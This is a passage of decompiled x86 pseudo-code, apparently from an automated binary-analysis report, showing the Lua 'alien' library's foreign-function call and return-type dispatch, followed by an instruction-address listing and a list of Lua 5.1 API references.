								 *((intOrPtr*)( *((intOrPtr*)(_t273 - 0xc)) + _t268)) = _t258;
								goto L36;
							case 1:
								L6:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp dword [ebp-0x18]");
								 *__eax =  *(__ebp - 0x18);
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 2:
								L5:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __eax;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 3:
								L8:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 4:
								L4:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 8);
								 *__ecx = __eax;
								__eax =  *(__ebp - 0xc);
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 5:
								L7:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__edx =  *(__ebp - 0xc);
								__esp = __esp + 8;
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__eax =  *(__ebp - 8);
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__ecx =  *(__ebp - 0x1c);
								 *__eax = __ecx;
								 *(__edx + __edi) = __eax;
								asm("fldcw word [ebp-0xe]");
								goto L36;
							case 6:
								goto L33;
							case 7:
								goto L0;
							case 8:
								L11:
								8 = E00A24686(8);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__eax = __fp0;
								__esp = __esp + 8;
								 *(__edx + __edi) = __eax;
								goto L36;
							case 9:
								L9:
								4 = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								 *__ecx = __al;
								__eax =  *(__ebp - 0xc);
								__esp = __esp + 8;
								 *(__eax + __edi) = __ecx;
								goto L36;
							case 0xa:
								L10:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F62();
								__ecx =  *(__ebp - 8);
								__edx =  *(__ebp - 0xc);
								 *__ecx = __al;
								__esp = __esp + 8;
								 *(__edx + __edi) = __ecx;
								goto L36;
							case 0xb:
								L12:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F50();
								__esp = __esp + 8;
								_push(__ebx);
								_push(__esi);
								if(__eax == 0) {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										__esp = __esp + 0xc;
										 *(__ecx + __edi) = __eax;
									} else {
										__edx =  *(__ebp - 8);
										__ecx =  *(__ebp - 0xc);
										 *__edx = __eax;
										__eax = __edx;
										 *(__ecx + __edi) = __eax;
									}
								} else {
									L00A23F4A();
									__esp = __esp + 8;
									if(__eax != 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__ecx + __edi) = __eax;
									} else {
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax = __ecx;
										__ecx =  *(__ebp - 0xc);
										 *(__ecx + __edi) = __eax;
									}
								}
								goto L36;
							case 0xc:
								L24:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								_push(__ebx);
								_push(__esi);
								L00A23F4A();
								__esp = __esp + 8;
								if(__eax != 0) {
									_push(__ebx);
									_push(__esi);
									L00A23F56();
									__esp = __esp + 8;
									if(__eax == 0) {
										_push(__ebx);
										_push(__esi);
										L00A23F0E();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 8;
										 *(__eax + __edi) = __ecx;
									} else {
										_push(0);
										_push(__ebx);
										_push(__esi);
										L00A23F5C();
										__ecx =  *(__ebp - 8);
										 *__ecx = __eax;
										__eax =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										 *(__eax + __edi) = __ecx;
									}
								} else {
									__ecx =  *(__ebp - 8);
									 *__ecx = __eax;
									__eax =  *(__ebp - 0xc);
									 *(__eax + __edi) = __ecx;
								}
								goto L36;
							case 0xd:
								L29:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x24);
								 *( *(__ebp - 0x24)) = __eax;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x24);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x24) = __ecx;
								goto L36;
							case 0xe:
								L30:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								asm("fnstcw word [ebp-0xe]");
								__eax =  *(__ebp - 0xe) & 0x0000ffff;
								__ecx =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								 *(__ebp - 0x18) =  *(__ebp - 0xe) & 0x0000ffff | 0x00000c00;
								__esp = __esp + 8;
								asm("fldcw word [ebp-0x18]");
								asm("fistp qword [ebp-0x1c]");
								__eax =  *(__ebp - 0x1c);
								 *( *(__ebp - 0x28)) =  *(__ebp - 0x1c);
								__eax = 4;
								asm("fldcw word [ebp-0xe]");
								__eax = E00A246A0(4);
								__ecx =  *(__ebp - 0x28);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 4;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x28) = __ecx;
								goto L36;
							case 0xf:
								L31:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__esp = __esp + 8;
								__eax = E00A245C0(__eax, __fp0);
								__ecx =  *(__ebp - 0x2c);
								 *( *(__ebp - 0x2c)) = __al;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x2c);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 1;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x2c) = __ecx;
								goto L36;
							case 0x10:
								L32:
								_push(__ebx);
								_push(__esi);
								L00A23F68();
								__eax =  *(__ebp - 0x40);
								 *( *(__ebp - 0x40)) = __fp0;
								__esp = __esp + 8;
								4 = E00A246A0(4);
								__ecx =  *(__ebp - 0x40);
								__edx =  *(__ebp - 0xc);
								__eax = __esp;
								 *__eax = __ecx;
								__ecx = __ecx + 8;
								 *(__edx + __edi) = __eax;
								 *(__ebp - 0x40) = __ecx;
								goto L36;
							case 0x11:
								L19:
								__eax = 4;
								__eax = E00A246A0(4);
								 *(__ebp - 8) = __esp;
								__eax = E00A21110(__eax, __ebx, __esi, "alien_callback");
								if(__eax == 0) {
									__eax = E00A21110(__eax, __ebx, __esi, "alien_function");
									if(__eax == 0) {
										_push("alien function or callback expected");
										_push(__ebx);
										_push(__esi);
										L00A23F14();
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										__esp = __esp + 0xc;
										__eax = 0;
										 *__ecx = 0;
										 *(__edx + __edi) = __ecx;
									} else {
										__eax =  *(__eax + 4);
										__ecx =  *(__ebp - 8);
										__edx =  *(__ebp - 0xc);
										 *__ecx = __eax;
										 *(__edx + __edi) = __ecx;
									}
								} else {
									__eax =  *__eax;
									__ecx =  *(__ebp - 8);
									__edx =  *(__ebp - 0xc);
									 *__ecx = __eax;
									 *(__edx + __edi) = __ecx;
								}
								goto L36;
						}
					}
					L37:
					_t249 =  *((intOrPtr*)(_t273 - 0x14));
					 *((intOrPtr*)(_t273 - 0x3c)) = 0;
					_t225 =  *(_t249 + 0xc);
					if(_t225 > 0xc) {
						L58:
						_t226 =  *(_t249 + 8);
						if(_t226 == 0) {
							_t226 = "anonymous";
						}
						_push(_t226);
						_push("alien: unknown return type (function %s)");
						_push(_t271);
						L00A23F26();
						L61:
						_t277 = _t276 + 0xc;
						L62:
						 *((intOrPtr*)(_t273 - 0x24)) =  *((intOrPtr*)(_t273 - 0x24)) +  ~( *(_t273 - 0x48)) * 4;
						 *((intOrPtr*)(_t273 - 0x2c)) =  *((intOrPtr*)(_t273 - 0x2c)) -  *((intOrPtr*)(_t273 - 0x30));
						_t269 = 0;
						 *((intOrPtr*)(_t273 - 0x28)) =  *((intOrPtr*)(_t273 - 0x28)) +  ~( *(_t273 - 0x38)) * 4;
						if( *((intOrPtr*)(_t273 - 0x44)) <= 0) {
							L72:
							_pop(_t270);
							_pop(_t272);
							_pop(_t246);
							return E00A245A4( *((intOrPtr*)(_t273 - 0x30)) +  *((intOrPtr*)(_t273 - 0x34)) +  *(_t273 - 0x38) +  *(_t273 - 0x48) + 1, _t246,  *(_t273 - 4) ^ _t273,  *(_t273 - 0x48), _t270, _t272);
						} else {
							goto L63;
						}
						do {
							L63:
							_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t273 - 0x14)) + 0x30)) + _t269 * 4)) + 0xfffffff3;
							if(_t237 > 3) {
								goto L71;
							}
							L64:
							switch( *((intOrPtr*)(_t237 * 4 +  &M00A228F8))) {
								case 0:
									L65:
									asm("fild dword [ecx]");
									_t280 = _t277 - 8;
									 *_t280 = _t287;
									_push(_t271);
									L00A23F80();
									_t277 = _t280 + 0xc;
									 *((intOrPtr*)(_t273 - 0x24)) =  *((intOrPtr*)(_t273 - 0x24)) + 4;
									goto L71;
								case 1:
									L66:
									__edx =  *(__ebp - 0x28);
									__eax =  *__edx;
									asm("fild dword [edx]");
									if(__eax < 0) {
										__fp0 = __fp0 +  *0xa25878;
									}
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x28) =  *(__ebp - 0x28) + 4;
									goto L71;
								case 2:
									L70:
									__ecx =  *(__ebp - 0x2c);
									__edx =  *__ecx;
									 *(__ebp - 0x18) = __edx;
									__esp = __esp - 8;
									asm("fild dword [ebp-0x18]");
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + 1;
									goto L71;
								case 3:
									L69:
									__fp0 =  *__ebx;
									__esp = __esp - 8;
									 *__esp = __fp0;
									_push(__esi);
									L00A23F80();
									__esp = __esp + 0xc;
									__ebx = __ebx + 8;
									goto L71;
							}
							L71:
							_t269 = _t269 + 1;
						} while (_t269 <  *((intOrPtr*)(_t273 - 0x44)));
						goto L72;
					}
					L38:
					switch( *((intOrPtr*)(_t225 * 4 +  &M00A228C4))) {
						case 0:
							L40:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__edx = __ebp - 0x20;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __ebp - 0x20, __edi, __fp0, __eax,  *(__eax + 4), __ebp - 0x20, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 1:
							L43:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t138 = __ebp - 0x20; // -28
							__edx = _t138;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, _t138, __edi, __fp0, __eax,  *(__eax + 4), _t138, __edi);
							__edx =  *(__ebp - 0x20) & 0x0000ffff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 2:
							L42:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t135 = __ebp - 0x20; // -28
							__edx = _t135;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi); // executed
							asm("fild dword [ebp-0x20]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 3:
							L48:
							_t145 = __ebp - 0x20; // -28
							__eax = _t145;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t145, __edi);
							asm("fild dword [ebp-0x20]");
							__edx =  *(__ebp - 0x20);
							goto L45;
						case 4:
							L41:
							_t130 = __ebp - 0x54; // -80
							__eax = _t130;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t130, __edi);
							asm("fild dword [ebp-0x54]");
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 5:
							L44:
							_t141 = __ebp - 0x58; // -84
							__eax = _t141;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t141, __edi);
							asm("fild dword [ebp-0x58]");
							__edx =  *(__ebp - 0x58);
							L45:
							if(__edx < 0) {
								__fp0 = __fp0 +  *0xa25878;
							}
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 6:
							L39:
							E00A24130(_t244, _t259, _t268, _t287,  *((intOrPtr*)(_t273 - 0x14)) + 0x10,  *((intOrPtr*)( *((intOrPtr*)(_t273 - 0x14)) + 4)), 0, _t268);
							_push(_t271);
							L00A23F74();
							_t277 = _t276 + 0x14;
							goto L62;
						case 7:
							L51:
							_t159 = __ebp - 0x50; // -76
							__eax = _t159;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t159, __edi);
							__fp0 =  *(__ebp - 0x50);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 8:
							L52:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t165 = __ebp - 0x60; // -92
							__edx = _t165;
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__fp0 =  *(__ebp - 0x60);
							__esp = __esp + 8;
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 9:
							L49:
							_t149 = __ebp - 0x20; // -28
							__eax = _t149;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t149, __edi);
							__edx =  *(__ebp - 0x20) & 0x000000ff;
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xa:
							L50:
							_t154 = __ebp - 0x20; // -28
							__eax = _t154;
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							__eax = __eax + 0x10;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), _t154, __edi);
							__edx =  *(__ebp - 0x20);
							 *(__ebp - 0x18) = __edx;
							__esp = __esp + 8;
							asm("fild dword [ebp-0x18]");
							 *__esp = __fp0;
							_push(__esi);
							L00A23F80();
							goto L61;
						case 0xb:
							L53:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t169 = __ebp - 0x3c; // -56
							__edx = _t169;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								goto L55;
							}
							L54:
							_push(__eax);
							_push(__esi);
							L00A23EF0();
							__esp = __esp + 8;
							goto L62;
						case 0xc:
							L56:
							__eax =  *(__ebp - 0x14);
							__ecx =  *(__eax + 4);
							_t173 = __ebp - 0x3c; // -56
							__edx = _t173;
							__eax = E00A24130(__ebx, __edx, __edi, __fp0, __eax,  *(__eax + 4), __edx, __edi);
							__eax =  *(__ebp - 0x3c);
							if(__eax == 0) {
								L55:
								_push(__esi);
								L00A23F74();
								__esp = __esp + 4;
								goto L62;
							}
							L57:
							_push(__eax);
							_push(__esi);
							L00A23F7A();
							__esp = __esp + 8;
							goto L62;
					}
				}
			}

0x00a22228
0x00a22228
0x00a22228
0x00a22228
0x00a22228
0x00a2222d
0x00a22232
0x00a22235
0x00a22237
0x00a2223c
0x00a22242
0x00a22244
0x00a22247
0x00a224ec
0x00a224ec
0x00a224ec
0x00a224f0
0x00a224f3
0x00a224f3
0x00a224f7
0x00000000
0x00000000
0x00a22071
0x00a22071
0x00a2207a
0x00a22080
0x00a224d0
0x00a224d0
0x00a224d5
0x00a224d7
0x00a224d7
0x00a224dc
0x00a224dd
0x00a224de
0x00a224e3
0x00a224e4
0x00a224e9
0x00000000
0x00a224e9
0x00a22086
0x00a22086
0x00000000
0x00a2208d
0x00a22092
0x00a22097
0x00a2209a
0x00a2209b
0x00a2209c
0x00a220a1
0x00a220a4
0x00a220a9
0x00a220ac
0x00a220af
0x00a220b2
0x00000000
0x00000000
0x00a22112
0x00a22117
0x00a2211c
0x00a2211f
0x00a22120
0x00a22121
0x00a22126
0x00a22129
0x00a2212d
0x00a22130
0x00a22133
0x00a22138
0x00a2213b
0x00a2213e
0x00a22141
0x00a22148
0x00a2214b
0x00a2214e
0x00000000
0x00000000
0x00a220e6
0x00a220e6
0x00a220eb
0x00a220f0
0x00a220f3
0x00a220f4
0x00a220f5
0x00a220fa
0x00a220fd
0x00a22102
0x00a22105
0x00a22108
0x00a2210a
0x00000000
0x00000000
0x00a22198
0x00a2219d
0x00a221a2
0x00a221a5
0x00a221a6
0x00a221a7
0x00a221ac
0x00a221af
0x00a221b3
0x00a221b6
0x00a221b9
0x00a221be
0x00a221c1
0x00a221c4
0x00a221c7
0x00a221ca
0x00a221cd
0x00a221cf
0x00a221d2
0x00000000
0x00000000
0x00a220ba
0x00a220ba
0x00a220bf
0x00a220c4
0x00a220c7
0x00a220c8
0x00a220c9
0x00a220ce
0x00a220d1
0x00a220d6
0x00a220d9
0x00a220db
0x00a220de
0x00000000
0x00000000
0x00a22156
0x00a2215b
0x00a22160
0x00a22163
0x00a22164
0x00a22165
0x00a2216a
0x00a2216d
0x00a22171
0x00a22174
0x00a22177
0x00a2217c
0x00a2217f
0x00a22182
0x00a22185
0x00a22188
0x00a2218b
0x00a2218d
0x00a22190
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a2224f
0x00a22254
0x00a22259
0x00a2225c
0x00a2225d
0x00a2225e
0x00a22263
0x00a22266
0x00a22269
0x00a2226b
0x00a2226e
0x00000000
0x00000000
0x00a221da
0x00a221df
0x00a221e4
0x00a221e7
0x00a221e8
0x00a221e9
0x00a221ee
0x00a221f1
0x00a221f3
0x00a221f6
0x00a221f9
0x00000000
0x00000000
0x00a22201
0x00a22201
0x00a22206
0x00a2220b
0x00a2220e
0x00a2220f
0x00a22210
0x00a22215
0x00a22218
0x00a2221b
0x00a2221d
0x00a22220
0x00000000
0x00000000
0x00a22276
0x00a22276
0x00a2227b
0x00a22280
0x00a22283
0x00a22284
0x00a22285
0x00a2228a
0x00a2228f
0x00a22290
0x00a22291
0x00a222cd
0x00a222d2
0x00a222d7
0x00a222eb
0x00a222ed
0x00a222ee
0x00a222ef
0x00a222f4
0x00a222f7
0x00a222fa
0x00a222fc
0x00a222fe
0x00a22301
0x00a222d9
0x00a222d9
0x00a222dc
0x00a222df
0x00a222e1
0x00a222e3
0x00a222e3
0x00a22293
0x00a22293
0x00a22298
0x00a2229d
0x00a222b1
0x00a222b2
0x00a222b3
0x00a222b8
0x00a222bb
0x00a222bd
0x00a222bf
0x00a222c2
0x00a222c5
0x00a2229f
0x00a2229f
0x00a222a2
0x00a222a4
0x00a222a6
0x00a222a9
0x00a222a9
0x00a2229d
0x00000000
0x00000000
0x00a2237e
0x00a2237e
0x00a22383
0x00a22388
0x00a2238b
0x00a2238c
0x00a2238d
0x00a22392
0x00a22397
0x00a223a9
0x00a223aa
0x00a223ab
0x00a223b0
0x00a223b5
0x00a223d3
0x00a223d4
0x00a223d5
0x00a223da
0x00a223dd
0x00a223df
0x00a223e2
0x00a223e5
0x00a223b7
0x00a223b7
0x00a223b9
0x00a223ba
0x00a223bb
0x00a223c0
0x00a223c3
0x00a223c5
0x00a223c8
0x00a223cb
0x00a223cb
0x00a22399
0x00a22399
0x00a2239c
0x00a2239e
0x00a223a1
0x00a223a1
0x00000000
0x00000000
0x00a223ed
0x00a223ed
0x00a223ee
0x00a223ef
0x00a223f4
0x00a223f7
0x00a223fc
0x00a223ff
0x00a22406
0x00a2240b
0x00a2240e
0x00a22411
0x00a22413
0x00a22415
0x00a22418
0x00a2241b
0x00000000
0x00000000
0x00a22423
0x00a22423
0x00a22424
0x00a22425
0x00a2242a
0x00a2242d
0x00a22431
0x00a22434
0x00a22439
0x00a2243c
0x00a2243f
0x00a22442
0x00a22445
0x00a22448
0x00a2244a
0x00a2244f
0x00a22452
0x00a22457
0x00a2245a
0x00a2245d
0x00a2245f
0x00a22461
0x00a22464
0x00a22467
0x00000000
0x00000000
0x00a2246f
0x00a2246f
0x00a22470
0x00a22471
0x00a22476
0x00a22479
0x00a2247e
0x00a22481
0x00a22488
0x00a2248d
0x00a22490
0x00a22493
0x00a22495
0x00a22497
0x00a2249a
0x00a2249d
0x00000000
0x00000000
0x00a224a2
0x00a224a2
0x00a224a3
0x00a224a4
0x00a224a9
0x00a224ac
0x00a224ae
0x00a224b6
0x00a224bb
0x00a224be
0x00a224c1
0x00a224c3
0x00a224c5
0x00a224c8
0x00a224cb
0x00000000
0x00000000
0x00a22309
0x00a22309
0x00a2230e
0x00a22313
0x00a2231b
0x00a22325
0x00a2233e
0x00a22348
0x00a2235d
0x00a22362
0x00a22363
0x00a22364
0x00a22369
0x00a2236c
0x00a2236f
0x00a22372
0x00a22374
0x00a22376
0x00a2234a
0x00a2234a
0x00a2234d
0x00a22350
0x00a22353
0x00a22355
0x00a22355
0x00a22327
0x00a22327
0x00a22329
0x00a2232c
0x00a2232f
0x00a22331
0x00a22331
0x00000000
0x00000000
0x00a22086
0x00a224fd
0x00a224fd
0x00a22500
0x00a22507
0x00a2250d
0x00a22753
0x00a22753
0x00a22758
0x00a2275a
0x00a2275a
0x00a2275f
0x00a22760
0x00a22765
0x00a22766
0x00a2276b
0x00a2276b
0x00a2276e
0x00a2278a
0x00a22790
0x00a22795
0x00a2279d
0x00a227a0
0x00a22843
0x00a22858
0x00a22859
0x00a2285a
0x00a22868
0x00000000
0x00000000
0x00000000
0x00a227a6
0x00a227a6
0x00a227af
0x00a227b5
0x00000000
0x00000000
0x00a227bb
0x00a227bb
0x00000000
0x00a227c2
0x00a227c5
0x00a227c7
0x00a227ca
0x00a227cd
0x00a227ce
0x00a227d3
0x00a227d6
0x00000000
0x00000000
0x00a227dc
0x00a227dc
0x00a227df
0x00a227e1
0x00a227e5
0x00a227e7
0x00a227e7
0x00a227ed
0x00a227f0
0x00a227f3
0x00a227f4
0x00a227f9
0x00a227fc
0x00000000
0x00000000
0x00a22818
0x00a22818
0x00a2281b
0x00a2281e
0x00a22821
0x00a22824
0x00a22827
0x00a2282a
0x00a2282b
0x00a22830
0x00a22833
0x00000000
0x00000000
0x00a22802
0x00a22802
0x00a22804
0x00a22807
0x00a2280a
0x00a2280b
0x00a22810
0x00a22813
0x00000000
0x00000000
0x00a22837
0x00a22837
0x00a2283a
0x00000000
0x00a227a6
0x00a22513
0x00a22513
0x00000000
0x00a2253b
0x00a2253b
0x00a2253e
0x00a22542
0x00a22547
0x00a2254b
0x00a22550
0x00a22554
0x00a22557
0x00a2255a
0x00a2255d
0x00a22560
0x00a22561
0x00000000
0x00000000
0x00a225bd
0x00a225bd
0x00a225c0
0x00a225c4
0x00a225c4
0x00a225c9
0x00a225cd
0x00a225d2
0x00a225d6
0x00a225d9
0x00a225dc
0x00a225df
0x00a225e2
0x00a225e3
0x00000000
0x00000000
0x00a22594
0x00a22594
0x00a22597
0x00a2259b
0x00a2259b
0x00a225a0
0x00a225a4
0x00a225a9
0x00a225ac
0x00a225af
0x00a225b2
0x00a225b3
0x00000000
0x00000000
0x00a22623
0x00a22624
0x00a22624
0x00a22628
0x00a2262b
0x00a2262f
0x00a22633
0x00a22638
0x00a2263b
0x00000000
0x00000000
0x00a2256b
0x00a2256c
0x00a2256c
0x00a22570
0x00a22573
0x00a22577
0x00a2257b
0x00a22580
0x00a22583
0x00a22586
0x00a22589
0x00a2258a
0x00000000
0x00000000
0x00a225ed
0x00a225ee
0x00a225ee
0x00a225f2
0x00a225f5
0x00a225f9
0x00a225fd
0x00a22602
0x00a22605
0x00a22608
0x00a2260a
0x00a2260c
0x00a2260c
0x00a22612
0x00a22615
0x00a22618
0x00a22619
0x00000000
0x00000000
0x00a2251a
0x00a22528
0x00a2252d
0x00a2252e
0x00a22533
0x00000000
0x00000000
0x00a226a0
0x00a226a1
0x00a226a1
0x00a226a5
0x00a226a8
0x00a226ac
0x00a226b0
0x00a226b5
0x00a226b8
0x00a226bb
0x00a226be
0x00a226bf
0x00000000
0x00000000
0x00a226c9
0x00a226c9
0x00a226cc
0x00a226d0
0x00a226d0
0x00a226d5
0x00a226d9
0x00a226de
0x00a226e1
0x00a226e4
0x00a226e7
0x00a226e8
0x00000000
0x00000000
0x00a22640
0x00a22641
0x00a22641
0x00a22645
0x00a22648
0x00a2264c
0x00a22650
0x00a22655
0x00a22659
0x00a2265c
0x00a2265f
0x00a22662
0x00a22665
0x00a22666
0x00000000
0x00000000
0x00a22670
0x00a22671
0x00a22671
0x00a22675
0x00a22678
0x00a2267c
0x00a22680
0x00a22685
0x00a22689
0x00a2268c
0x00a2268f
0x00a22692
0x00a22695
0x00a22696
0x00000000
0x00000000
0x00a226f2
0x00a226f2
0x00a226f5
0x00a226f9
0x00a226f9
0x00a22702
0x00a22707
0x00a2270f
0x00000000
0x00000000
0x00a22711
0x00a22711
0x00a22712
0x00a22713
0x00a22718
0x00000000
0x00000000
0x00a22728
0x00a22728
0x00a2272b
0x00a2272f
0x00a2272f
0x00a22738
0x00a2273d
0x00a22745
0x00a2271d
0x00a2271d
0x00a2271e
0x00a22723
0x00000000
0x00a22723
0x00a22747
0x00a22747
0x00a22748
0x00a22749
0x00a2274e
0x00000000
0x00000000
0x00a22513

APIs

lua_tonumber.LUA5.1 ref: 00A22237
lua_pushnil.LUA5.1(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2252E
lua_pushnumber.LUA5.1(?,?,?), ref: 00A22561
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?), ref: 00A2258A
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?), ref: 00A225B3
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00A225E3
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 00A22619
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22666
lua_pushnumber.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22696
